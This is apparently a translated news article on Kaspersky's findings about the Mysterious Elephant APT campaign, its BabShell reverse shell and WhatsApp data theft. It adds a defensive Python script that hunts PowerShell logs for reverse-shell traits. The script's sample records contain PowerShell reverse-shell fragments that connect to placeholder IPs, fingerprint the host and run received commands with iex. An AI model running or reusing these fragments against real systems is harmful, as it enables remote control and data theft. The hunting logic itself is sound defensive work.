JAKARTA - In early 2025, the Kaspersky Global Research and Analysis Team (GReAT) identified a new campaign by the APT group Mysterious Elephant, targeting government entities and foreign affairs organizations across the Asia Pacific region.
The group aims to steal highly sensitive information, including documents, images, and archive files, with data shared through WhatsApp singled out for exfiltration.
For initial access it uses a combination of exploit kits, personalized spear-phishing emails, and malicious documents, tailoring each attack to the specific victim.
Once inside the network, the threat actors use a range of tools and techniques to escalate privileges, move laterally, and search for sensitive data.
PowerShell scripts form the operational foundation of Mysterious Elephant's toolset, allowing the group to execute commands, deploy additional malware, and maintain persistence on compromised systems.
One of the main tools in the group's arsenal is BabShell, a reverse shell that gives the attackers direct access to infected machines.
Once executed, the tool collects key system information, including the username, computer name, and MAC address, to uniquely identify each compromised host.
This campaign is particularly notable for its focus on WhatsApp data theft. The attackers have developed a dedicated module capable of extracting files shared through the application, including sensitive documents, photos, and archives.
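The combination described above, a PowerShell reverse shell that opens an outbound connection, executes whatever the operator sends, and fingerprints the host with username, computer name, and MAC address, is something defenders can hunt for in PowerShell script block logging (event ID 4104, ScriptBlockText). The script below is an added example written for this article, not Kaspersky's research code or BabShell itself. It scans a few constructed log records for those three traits and flags blocks that show a socket together with either command execution or a host fingerprint. The indicator patterns, host names, and addresses are illustrative assumptions, not published BabShell indicators.

```python
"""Heuristic hunt for reverse-shell-style PowerShell in script block logs.

Added example for illustration: the regexes below are generic assumptions
about what an in-memory PowerShell reverse shell needs, not indicators
published for BabShell or any other specific tool.
"""
import re
from typing import Dict, List, Tuple

# Case-insensitive patterns per indicator class. PowerShell ignores case,
# so every pattern is compiled with re.I.
INDICATORS: Dict[str, re.Pattern] = {
    # Outbound socket creation, e.g. New-Object System.Net.Sockets.TcpClient
    "socket": re.compile(r"sockets\.tcpclient", re.I),
    # Network stream used for the read/write loop
    "stream": re.compile(r"\.getstream\(\)", re.I),
    # Executing operator-supplied text as PowerShell
    "exec": re.compile(r"\binvoke-expression\b|\biex\b|\[scriptblock\]::create", re.I),
    # Host fingerprinting: user, computer name, MAC address
    "user": re.compile(r"\$env:username|\bwhoami\b|\[environment\]::username", re.I),
    "host": re.compile(r"\$env:computername|\bhostname\b|\[environment\]::machinename", re.I),
    "mac": re.compile(r"macaddress|\bgetmac\b|\bwin32_networkadapter\b", re.I),
}


def normalize(text: str) -> str:
    """Drop PowerShell backticks, which attackers insert to split type names
    (Sy`stem.Net.Sock`ets) and defeat naive substring matching."""
    return text.replace("`", "")


def analyze_script_block(text: str) -> Dict[str, object]:
    """Return the indicator classes present and a suspicious verdict.

    A socket on its own is common in admin tooling; a socket combined with
    command execution, or with at least two fingerprint elements, matches the
    shape of a reverse shell that identifies its victim to the operator.
    """
    norm = normalize(text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(norm))
    fingerprint = {"user", "host", "mac"} & set(hits)
    suspicious = "socket" in hits and ("exec" in hits or len(fingerprint) >= 2)
    return {"hits": hits, "suspicious": suspicious}


def hunt(records: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (host, hits) for each record whose script block looks like a reverse shell."""
    flagged = []
    for host, block in records:
        result = analyze_script_block(block)
        if result["suspicious"]:
            flagged.append((host, result["hits"]))
    return flagged


# Constructed sample records (hostname, ScriptBlockText) modelled on event ID 4104.
# Hostnames and IP addresses are made up; none of this is real telemetry.
SAMPLE_4104_RECORDS: List[Tuple[str, str]] = [
    # Benign inventory script: reads MAC addresses but opens no socket.
    ("ws-finance-01", "Get-NetAdapter | Select-Object Name, MacAddress | Export-Csv C:\\inv\\nics.csv"),
    # Benign connectivity check: no TcpClient, no exec, no fingerprint.
    ("ws-finance-02", "Test-NetConnection -ComputerName mail.example.invalid -Port 443"),
    # Reverse-shell-like block: outbound TcpClient, full fingerprint, read/iex loop.
    ("ws-moa-07",
     "$c=New-Object System.Net.Sockets.TcpClient('203.0.113.10',4444);$s=$c.GetStream();"
     "$id=\"$env:USERNAME|$env:COMPUTERNAME|$((Get-NetAdapter)[0].MacAddress)\";"
     "[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){"
     "$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String)}"),
    # Same idea with a backtick-split type name and command-based fingerprinting.
    ("ws-moa-09",
     "$c=New-Object Sy`stem.Net.Sock`ets.TcpClient('198.51.100.5',8080);"
     "$who=(whoami)+'|'+(hostname)+'|'+(getmac);$s=$c.GetStream()"),
]


if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_4104_RECORDS):
        print(f"{host}: suspicious script block, indicators={hits}")
```

Run as-is, the script flags ws-moa-07 and ws-moa-09 and leaves the two finance workstations alone. In production the records would come from the Microsoft-Windows-PowerShell/Operational log or a SIEM export rather than the embedded list, and the verdict should be tuned against an allowlist of known administrative scripts; the point of the heuristic is the co-occurrence of traits, not any single string.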
"It is very important that organizations implement effective countermeasures to reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands," said Noushin Shabab, head of security research at Kaspersky GReAT.
She also emphasized that organizations should implement strong security measures, including regular software updates, network monitoring, and employee training.
The English, Chinese, Japanese, Arabic, and French versions are generated automatically by AI, so the translations may still contain inaccuracies; please always refer to the Indonesian version as our primary language. (System supported by DigitalSiber.id)